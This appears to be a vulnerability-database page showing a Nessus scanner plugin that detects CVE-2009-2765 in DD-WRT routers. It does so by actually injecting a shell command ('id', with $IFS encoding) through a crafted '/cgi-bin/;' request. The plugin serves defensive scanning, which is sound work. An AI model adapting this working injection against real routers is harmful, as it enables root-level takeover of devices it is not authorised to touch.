Lucene search
This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.DDWRT_CGIBIN_CMD_EXEC.NASLHistoryJul 23, 2009 - 12:00 a.m.
DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution
2009-07-2300:00:00
This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
191
CVSS2
8.3
Attack Vector
ADJACENT_NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:A/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.972
Percentile
99.8%
The remote web server is vulnerable to a command injection attack that may allow an attacker to execute arbitrary commands on the remote server (usually with root privileges).
An attacker can exploit this flaw to take complete ownership of the remote device.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if(description)
{
script_id(40353);
script_version("1.20");
script_cve_id("CVE-2009-2765");
script_bugtraq_id(35742);
script_xref(name:"EDB-ID", value:"9209");
script_name(english:"DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution");
script_summary(english:"Tries to execute a command");
script_set_attribute(
attribute:"synopsis",
value:"An attacker can execute arbitrary code on the remote router."
);
script_set_attribute( attribute:"description", value:
"The remote web server is vulnerable to a command injection attack that
may allow an attacker to execute arbitrary commands on the remote server
(usually with root privileges).
An attacker can exploit this flaw to take complete ownership of the
remote device." );
script_set_attribute(
attribute:"see_also",
value:"http://www.dd-wrt.com/dd-wrtv3/index.php"
);
script_set_attribute(
attribute:"see_also",
value:"https://forum.dd-wrt.com/phpBB2/viewtopic.php?t=55173"
);
script_set_attribute(
attribute:"solution",
value:"Unknown at this time."
);
script_set_cvss_base_vector("CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'DD-WRT HTTP Daemon Arbitrary Command Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_cwe_id(20);
script_set_attribute(
attribute:"vuln_publication_date",
value:"2009/07/20"
);
script_set_attribute(
attribute:"plugin_publication_date",
value:"2009/07/23"
);
script_cvs_date("Date: 2018/11/15 20:50:25");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, embedded:TRUE);
file = http_get_cache(port:port, item:"/", exit_on_fail: 1);
if (
"http://www.dd-wrt.com/" >!< file &&
">DD-WRT Control Panel<" >!< file
) exit(0, "DD-WRT is not running on the remote host.");
cmd = "id";
cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";
enc_cmd = str_replace(find:" ", replace:"$IFS", string:cmd);
enc_cmd = urlencode(
str : enc_cmd,
unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/=;$"
);
# nb: don't use the HTTP API here as the remote server will not
# answer with a valid HTTP reply.
for (fd=5; fd<=7; fd++)
{
soc = open_sock_tcp(port);
if (!soc) exit(1, "Could not re-connect to the remote server.");
req = string(
'GET /cgi-bin/;', enc_cmd, '>&', fd, ' HTTP/1.0\r\n',
'\r\n'
);
send(socket:soc, data:req);
res = recv(socket:soc, length:4096);
if (res && egrep(pattern:cmd_pat, string:res))
{
if (report_verbosity > 0)
{
report = string(
"\n",
"Nessus was able to execute the command '", cmd, "' on the remote \n",
"host using the following request :\n",
"\n",
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
req,
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
);
if (report_verbosity > 1)
{
output = res - strstr(res, "HTTP/1.0 401 Unauthorized");
report = string(
report,
"\n",
"It produced the following output :\n",
"\n",
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
data_protection::sanitize_uid(output:output),
crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
);
}
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
exit(0, 'The host is not vulnerable.');
Related
nvd
nvd
CVE-2009-2765
2009-08-14 15:16:27
cve
cve
CVE-2009-2765
2009-08-14 15:16:27
packetstorm
packetstorm
DD-WRT HTTP Daemon Arbitrary Command Execution
2009-10-27 00:00:00
exploitdb
exploitdb
DD-WRT HTTP v24-SP1 - Command Injection
2009-07-20 00:00:00
DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)
2010-07-07 00:00:00
DD-WRT HTTPd Daemon/Service - Remote Command Execution
2009-07-20 00:00:00
metasploit
metasploit
DD-WRT HTTP Daemon Arbitrary Command Execution
2009-07-21 12:56:42
seebug
seebug
DD-WRT HTTP v24-SP1 Command Injection Vulnerability
2009-07-20 00:00:00
openvas
openvas
prion
prion
Design/Logic Flaw
2009-08-14 15:16:00
cvelist
cvelist
CVE-2009-2765
2009-08-14 15:00:00
CVSS2
8.3
Attack Vector
ADJACENT_NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:A/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.972
Percentile
99.8%
Related for DDWRT_CGIBIN_CMD_EXEC.NASL